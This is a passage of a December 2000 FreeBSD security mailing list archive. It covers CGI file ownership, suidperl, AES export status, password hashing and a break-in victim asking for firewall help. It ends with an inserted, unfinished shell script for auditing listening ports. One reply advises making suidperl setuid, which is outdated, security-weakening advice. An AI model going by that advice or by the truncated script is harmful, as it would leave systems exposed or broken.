Kris --0F1p//8PRICkK4MW-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 21:45:29 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 21:45:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from neptune.entic.net (unknown [63.125.62.132]) by hub.freebsd.org (Postfix) with SMTP id 24E0637B402 for ; Mon, 11 Dec 2000 21:45:24 -0800 (PST) Received: (qmail 69907 invoked by uid 100); 12 Dec 2000 05:45:20 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 Dec 2000 05:45:20 -0000 Date: Tue, 12 Dec 2000 05:45:20 +0000 (GMT) From: Anil Jangity To: Cc: , Subject: Can't remove uid "nobody" files... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org IHAU who created some files (don't know how) but I can't seem to remove them: id: uid=1527(roki) gid=1000(shell) groups=1000(shell) FreeBSD mars 4.2-STABLE FreeBSD 4.2-STABLE #0: Sun Dec 10 11:07:18 GMT 2000 root@mars:/src/sys/compile/kernel.mars i386 roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % ls -loa index.html -rw-r--r-- 1 nobody shell - 143 Sep 25 22:48 index.html roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % pwd /home/roki/public_html/cgi-bin/UltraBoard/Private/Backups Two questions: 1. How did he create a file with permissions "nobody"? 
I tried to do the same and I either get operation not permitted or it really creates the file with my uid and not as uid nobody. I even tried to tar -cvf up a file with uid nobody and then tried to extract it as normal user... just to see 2. How do I remove them? (I haven't tried to do it as root... just yet) Thanks in advance. PS: When replying please make sure my email address is there - not subscribed to -questions. Kind regards, Anil Jangity (Taos) anil@taos.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 4: 1:34 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 04:01:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 0203237B400; Tue, 12 Dec 2000 04:01:28 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id HAA82996; Tue, 12 Dec 2000 07:08:19 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Tue, 12 Dec 2000 07:08:18 -0500 (EST) From: Ralph Huntington To: Anil Jangity Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: Can't remove uid "nobody" files... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Files owned by user 'nobody' are usually created by the web server (http daemon running as 'nobody') in a world-writable directory that is generally owned by the user who owns the script that causes the files to be written. It's actually rather common, if not good practice (cgi 'wrappers' are a better way, IMO). If the directory is no longer world-writable, you'll need to be root to remove them (or the user who owns the directory in which the files reside).
-=r=- On Tue, 12 Dec 2000, Anil Jangity wrote: > IHAU who created some files (don't know how) but I can't seem to remove > them: > > id: > uid=1527(roki) gid=1000(shell) groups=1000(shell) > > > FreeBSD mars 4.2-STABLE FreeBSD 4.2-STABLE #0: Sun Dec 10 > 11:07:18 GMT 2000 root@mars:/src/sys/compile/kernel.mars i386 > > roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % ls -loa > index.html > -rw-r--r-- 1 nobody shell - 143 Sep 25 22:48 index.html > roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % pwd > /home/roki/public_html/cgi-bin/UltraBoard/Private/Backups > > > > Two questions: > > 1. How did he create a file with permissions "nobody"? I tried to do the > same and I either get operation not permitted or it really creates the > file with my uid and not as uid nobody. I even tried to tar -cvf up a file > with uid nobody and then tried to extract it as normal user... just to see > > 2. How do I remove them? (I haven't tried to do it as root... just yet) > > > Thanks in advance. > > PS: When replying please make sure my email address is there - not > subscribed to -questions.
> > > Kind regards, > > Anil Jangity (Taos) > anil@taos.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 6: 5:58 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 06:05:55 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6786E37B400 for ; Tue, 12 Dec 2000 06:05:55 -0800 (PST) Received: from internet.eunet.sk (Internet.EUnet.sk [192.108.130.91]) by mx1.FreeBSD.org (Postfix) with ESMTP id BA6E96E2DBE for ; Tue, 12 Dec 2000 06:05:53 -0800 (PST) Received: from jurko ([195.12.128.49]) by internet.eunet.sk (8.9.1/8.9.3) with SMTP id PAA30088 for ; Tue, 12 Dec 2000 15:05:43 +0100 From: jucnik@ew.sk Message-ID: <3A362FFB.4000@ew.sk> Date: Tue, 12 Dec 2000 15:02:35 +0100 X-Mailer: Mozilla 3.03 (Win95; I) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Interface Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I know this is off-topic, but does anybody know, why in include file is so many errors (defined struct: aaa struct sockaddr bbb instead of aaa struct sockaddr *bbb) ? i can't compile my progs without this functional... 
bye & thnx for reply juro@internet.sk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 7:22:31 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 07:22:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id AA1C237B400 for ; Tue, 12 Dec 2000 07:22:27 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id QAA61279; Tue, 12 Dec 2000 16:22:14 +0100 (CET) (envelope-from des@ofug.org) Sender: des@ofug.org X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Roberto Samarone Araujo (RSA)" Cc: Subject: Re: FreeBSD 4.2 and Suid files References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> From: Dag-Erling Smorgrav Date: 12 Dec 2000 16:22:13 +0100 In-Reply-To: "Roberto Samarone Araujo's message of "Mon, 11 Dec 2000 19:29:31 -0300" Message-ID: Lines: 10 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Roberto Samarone Araujo (RSA)" writes: > I have some suid perl scripts that was working fine on my FreeBSD > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > I try to execute them, the system show the message: "Can't do setuid" Type 'chmod u+s /usr/bin/suidperl' as root. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:32:39 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:32:37 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 3D13037B400 for ; Tue, 12 Dec 2000 08:32:33 -0800 (PST) Received: (qmail 46492 invoked by uid 1000); 12 Dec 2000 16:31:44 -0000 Date: Tue, 12 Dec 2000 18:31:44 +0200 From: Peter Pentchev To: security@FreeBSD.org Subject: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212183144.G36405@ringworld.oblivion.bg> Mail-Followup-To: security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, so I know this might be a bit off-topic here, but still.. :) So does anybody have any idea if there are any restrictions on code using Rijndael? Read-the-fine-document-at-the-end-of-this-link answers will be more than welcome :) G'luck, Peter -- This would easier understand fewer had omitted. ----- Forwarded message from Peter Pentchev ----- Date: Tue, 12 Dec 2000 15:43:47 +0200 From: Peter Pentchev To: ports@FreeBSD.org Subject: Rijndael restrictions - are there any? User-Agent: Mutt/1.2.5i Hi porters, I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - a command-line Rijndael (AES) encryption/decryption utility. Nearly the only thing that's holding me back from committing it is that I'm not quite clear on Rijndael's export restrictions - should this port be marked RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch confirmation (I hope not)? 
----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:39:57 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:39:53 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id CE66837B69F for ; Tue, 12 Dec 2000 08:39:43 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 86F8318C7; Tue, 12 Dec 2000 11:39:42 -0500 (EST) Date: Tue, 12 Dec 2000 11:39:42 -0500 From: Will Andrews To: Peter Pentchev Cc: security@FreeBSD.ORG Subject: Re: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212113942.E840@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Peter Pentchev , security@FreeBSD.ORG References: <20001212183144.G36405@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001212183144.G36405@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, Dec 12, 2000 at 06:31:44PM +0200 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 12, 2000 at 06:31:44PM +0200, Peter Pentchev wrote: > I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - > a command-line Rijndael (AES) encryption/decryption utility. Nearly > the only thing that's holding me back from committing it is that I'm not > quite clear on Rijndael's export restrictions - should this port be marked > RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch > confirmation (I hope not)? No. Rijndael is exportable. 
-- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:45:26 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:45:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id B154537B400 for ; Tue, 12 Dec 2000 08:45:21 -0800 (PST) Received: (qmail 47162 invoked by uid 1000); 12 Dec 2000 16:44:27 -0000 Date: Tue, 12 Dec 2000 18:44:27 +0200 From: Peter Pentchev To: Will Andrews , security@FreeBSD.ORG Subject: Re: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212184427.H36405@ringworld.oblivion.bg> Mail-Followup-To: Will Andrews , security@FreeBSD.ORG References: <20001212183144.G36405@ringworld.oblivion.bg> <20001212113942.E840@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001212113942.E840@puck.firepipe.net>; from will@physics.purdue.edu on Tue, Dec 12, 2000 at 11:39:42AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 12, 2000 at 11:39:42AM -0500, Will Andrews wrote: > On Tue, Dec 12, 2000 at 06:31:44PM +0200, Peter Pentchev wrote: > > I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - > > a command-line Rijndael (AES) encryption/decryption utility. Nearly > > the only thing that's holding me back from committing it is that I'm not > > quite clear on Rijndael's export restrictions - should this port be marked > > RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch > > confirmation (I hope not)? > > No. Rijndael is exportable. Thanks! :) G'luck, Peter -- You have, of course, just begun reading the sentence that you have just finished reading. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:59:24 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:59:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 7343437B400 for ; Tue, 12 Dec 2000 08:58:18 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 145soC-0000Ac-00; Tue, 12 Dec 2000 10:01:44 -0700 Sender: wes@FreeBSD.ORG Message-ID: <3A3659F8.B7C1F990@softweyr.com> Date: Tue, 12 Dec 2000 10:01:44 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: jucnik@ew.sk Cc: freebsd-security@freebsd.org Subject: Re: Interface References: <3A362FFB.4000@ew.sk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jucnik@ew.sk wrote: > > Hello. > > I know this is off-topic, but does anybody know, why in include file > is so many errors (defined struct: aaa struct sockaddr bbb > instead of aaa struct sockaddr *bbb) ? > > i can't compile my progs without this functional... has no errors in it. Your program has an error, not including the other include files that needs. Locate the structures that are not defined in the include files and #include those before . Repeat until the errors go away. Or, poke through the system sources for another source file that includes and duplicate its list of include files. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:22: 9 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:22:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id C25F437B402 for ; Wed, 13 Dec 2000 05:22:07 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA31761 for ; Wed, 13 Dec 2000 08:23:55 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 13 Dec 2000 08:23:55 -0500 (EST) From: Ralph Huntington To: freebsd-security@FreeBSD.ORG Subject: DES or MD5 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Which is more secure, inherently, DES or MD5 for passwords? 
Thanks, ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:27: 5 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:27:01 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 8D5CE37B402 for ; Wed, 13 Dec 2000 05:26:59 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 146Bvr-0003ai-00; Wed, 13 Dec 2000 15:26:55 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id PAA09928; Wed, 13 Dec 2000 15:26:53 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 9517; Wed Dec 13 15:24:49 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 146Btp-0003YA-00; Wed, 13 Dec 2000 15:24:49 +0200 From: Sheldon Hearn To: Ralph Huntington Cc: freebsd-security@freebsd.org Subject: Re: DES or MD5 In-reply-to: Your message of "Wed, 13 Dec 2000 08:23:55 EST." Date: Wed, 13 Dec 2000 15:24:49 +0200 Message-ID: <13649.976713889@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph http://www.freebsd.org/handbook/crypt.html Ciao, Sheldon. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:27:57 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:27:54 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 9520537B400 for ; Wed, 13 Dec 2000 05:27:53 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA31927; Wed, 13 Dec 2000 08:29:36 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 13 Dec 2000 08:29:36 -0500 (EST) From: Ralph Huntington To: Sheldon Hearn Cc: freebsd-security@freebsd.org Subject: Re: DES or MD5 In-Reply-To: <13649.976713889@axl.fw.uunet.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org thank you for the reference On Wed, 13 Dec 2000, Sheldon Hearn wrote: > > > On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > > > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph > > http://www.freebsd.org/handbook/crypt.html > > Ciao, > Sheldon. 
> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 6:22: 5 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 06:21:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from arka.ids.bielsko.pl (arka.ids.bielsko.pl [195.117.233.8]) by hub.freebsd.org (Postfix) with ESMTP id 88DD337B698 for ; Wed, 13 Dec 2000 06:21:40 -0800 (PST) Received: by arka.ids.bielsko.pl (8.9.3/8.9.3) id PAA05668 for freebsd-security@FreeBSD.org; Wed, 13 Dec 2000 15:19:11 +0100 (MET) Date: Wed, 13 Dec 2000 15:19:11 +0100 (MET) Message-Id: <200012131419.PAA05668@arka.ids.bielsko.pl> Subject: New European Promotional Contest From: office@euroleader.org MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Content-Type: multipart/alternative; boundary="------------070C33C436192682FC31B74B" Sender: lider@arka.ids.bielsko.pl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------070C33C436192682FC31B74B Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit Dear Sirs, We are very pleased to welcome you and present a new economic initiative for producers from all European countries - both western and eastern. FOR THE FIRST TIME - ON SUCH A LARGE SCALE - IN THE VERY HEART OF EUROPE! [Image] "EURO LEADER 2001" This is an honourable title and prestigious Promotional Emblem in European Promotional Contest. This is an effective tool of promotion and marketing in Europe by means of which it is much easier to reach western markets, increase export and gain new partners for cooperation in the field of production and investment. The contest is a Polish initiative. It will be settled in March, 2001 in Warsaw. Therefore it will bring the best commercial effects on a stable, almost 40-million prospective customers Polish market, having over 5% economic growth, which will soon become an integral market of European Union. 
Click http://www.euroleader.org/ and get acquainted with the details of the contest, enter for the European competition. It will bring you success and a good start in the XXI century! You are good but are you well-known? You will be well-known! Join us. Yours faithfully, INTERRES International Building Fair and Promotion - from Poland B2B - Internet Portal Tadeusz Ziobro - President. --------------070C33C436192682FC31B74B Content-Type: multipart/related; boundary="------------CEE33E5E78D696CB4E0EC941" --------------CEE33E5E78D696CB4E0EC941 Content-Type: text/html; charset=iso-8859-2 Content-Transfer-Encoding: 8bit
--------------CEE33E5E78D696CB4E0EC941 Content-Type: image/jpeg Content-ID: Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="C:\WINDOWS\TEMP\nsmail24.jpeg" --------------CEE33E5E78D696CB4E0EC941-- --------------070C33C436192682FC31B74B-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 7:23:34 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 07:23:30 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8483637B699 for ; Wed, 13 Dec 2000 07:23:30 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDFMF313465; Wed, 13 Dec 2000 10:22:15 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 10:22:15 -0500 (EST) From: Rob Simmons To: Sheldon Hearn Cc: Ralph Huntington , freebsd-security@FreeBSD.ORG Subject: Re: DES or MD5 In-Reply-To: <13649.976713889@axl.fw.uunet.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to configure FreeBSD to use SHA1? Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Sheldon Hearn wrote: > > > On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > > > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph > > http://www.freebsd.org/handbook/crypt.html > > Ciao, > Sheldon.
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 7:29: 8 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 07:29:06 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 16A9437B404 for ; Wed, 13 Dec 2000 07:29:04 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 146Dob-0005Eo-00; Wed, 13 Dec 2000 17:27:33 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id RAA05475; Wed, 13 Dec 2000 17:27:32 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 5320; Wed Dec 13 17:26:30 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 146Dna-0003tT-00; Wed, 13 Dec 2000 17:26:30 +0200 From: Sheldon Hearn Reply-To: freebsd-questions@freebsd.org To: Rob Simmons Cc: Ralph Huntington , freebsd-security@freebsd.org Subject: Re: DES or MD5 In-reply-to: Your message of "Wed, 13 Dec 2000 10:22:15 EST." Date: Wed, 13 Dec 2000 17:26:30 +0200 Message-ID: <14970.976721190@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Dec 2000 10:22:15 EST, Rob Simmons wrote: > Is there a way to configure FreeBSD to use SHA1? At this time, I don't think so. The login.conf(5) manual page suggests that MD5 and DES are your only choices at this time. I should have mentioned in my original reply that this thing would be better handled on the freebsd-questions mailing list. Please follow up on that list instead of the freebsd-security list. Ciao, Sheldon. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 8:14:41 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 08:14:39 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from www.freebsdbox.com (unknown [216.199.94.2]) by hub.freebsd.org (Postfix) with ESMTP id 6C01F37B400 for ; Wed, 13 Dec 2000 08:14:38 -0800 (PST) Received: from localhost (robert@localhost) by www.freebsdbox.com (8.11.1/8.11.1) with ESMTP id eBDGItl00559; Wed, 13 Dec 2000 11:18:56 -0500 (EST) (envelope-from robert@cards2talk.com) Date: Wed, 13 Dec 2000 11:18:55 -0500 (EST) From: Robert McCallum X-Sender: robert@www.freebsdbox.com To: misc@openbsd.org Cc: freebsd-security@freebsd.org Subject: 911 lockdown! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' the server 'yet'. But I do see that they have obtained access to a user account. It appears they cracked a user's account which I found out that one of my users did not adhere to our security policy and set a password that was not in accordance to our password policy. I did find the cracker's address, although he did attempt to clean-up after himself, he was not very good. The machines were up approx. 1 month and are not behind a firewall as of yet. The delay of setting up a firewall ( which there is no excuse ) is due to the fact that we are moving to a new office and leasing bandwidth from a different service provider. Who is going to assign us a new block of IP's. Laziness is the cause of this break-in. I lack the hardware to setup a firewall/router at this time. The only thing I can do is firewall the server itself.
I have already wrapped and disallowed access to many services from outside our subnet, but this does not seem to be sufficient since so ports are still open and can be accessed such as, X11 on 6000, SMTP 25, IMAP on 143, etc. I also noticed that on port 587 the service named 'submission' is open ... and when I telnet to it ... It starts a sendmail shell like port 25. Is this normal? I don't remember seeing this before.

In conclusion, I need to setup a firewall on that particular host ASAP. I have read a lot of documentation on firewalls and internet security which I do understand. However, I am not exp. with IP FILTER or IPFW.

I have one NIC in my box with that address of (example address) 208.202.32.3 and have 2 other IP's bound to the same interface. (IP Aliasing)

Being that time is of the essence here, I do not have the time to read up on firewall rules right now, I would be eternally grateful for some help with the rules I need in order to filter the following ports and close all others.

Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
25/tcp     open        smtp
53/tcp     open        domain
80/tcp     open        http
110/tcp    open        pop-3
111/tcp    open        sunrpc
143/tcp    open        imap2
587/tcp    open        submission
3306/tcp   open        mysql
6000/tcp   open        X11

ftp and ssh are wrapped (I know, not a good idea to wrap ssh.) In this case I had to.

I am sure I can figure out how to setup IPFILTER as long as I have the correct rules. However it would be helpful to have a very fast run down of the steps I need to take in order to get it running.

thanks a lot for taking the time to read this...

-robert

please CC: me a copy of any replies.
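
The port 587 question above comes down to which process owns each listening socket, which is what sockstat(1), recommended in a reply further down this thread, reports. The script below is an added example, not part of any post in the thread: it checks sockstat-style output against an expected port-to-daemon list. The sample listing, the allowlist and the function names are constructed, and the column layout assumed is that of current FreeBSD `sockstat -4l`.

```shell
#!/bin/sh
# Added example: classify listening TCP sockets against an expected
# port -> daemon list. Assumed input columns (FreeBSD `sockstat -4l`):
#   USER COMMAND PID FD PROTO LOCAL-ADDRESS FOREIGN-ADDRESS

# Constructed sample listing (not captured from the host in the thread).
sample_sockstat() {
cat <<'EOF'
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sendmail   214   4  tcp4   *:25                  *:*
root     sendmail   214   5  tcp4   *:587                 *:*
root     sshd       198   3  tcp4   *:22                  *:*
bind     named      160   20 tcp4   208.202.32.3:53       *:*
bind     named      160   21 udp4   208.202.32.3:53       *:*
www      httpd      301   16 tcp4   *:80                  *:*
root     inetd      187   4  tcp4   *:21                  *:*
root     inetd      187   5  tcp4   *:110                 *:*
root     inetd      187   6  tcp4   *:143                 *:*
daemon   portmap    152   4  tcp4   *:111                 *:*
mysql    mysqld     340   3  tcp4   *:3306                *:*
root     XFree86    412   0  tcp4   *:6000                *:*
mysql    mysqld     340   5  tcp4   127.0.0.1:3307        *:*
EOF
}

# audit_listeners "port:command ..."   (sockstat output on stdin)
# Prints one line per TCP listener: VERDICT port command pid=N user=U
#   OK          port is expected and owned by the expected daemon
#   MISMATCH    port is expected but another program holds it
#   UNEXPECTED  port is reachable from the network and not on the list
#   LOCAL       bound to loopback only
audit_listeners() {
    awk -v allow="$1" '
    BEGIN {
        n = split(allow, pairs, " ")
        for (i = 1; i <= n; i++) {
            split(pairs[i], kv, ":")
            expected[kv[1]] = kv[2]
        }
    }
    # TCP listeners only; this also skips the header and UDP sockets
    $1 == "USER" || $5 !~ /^tcp/ { next }
    {
        port = $6; sub(/^.*:/, "", port)      # text after the last colon
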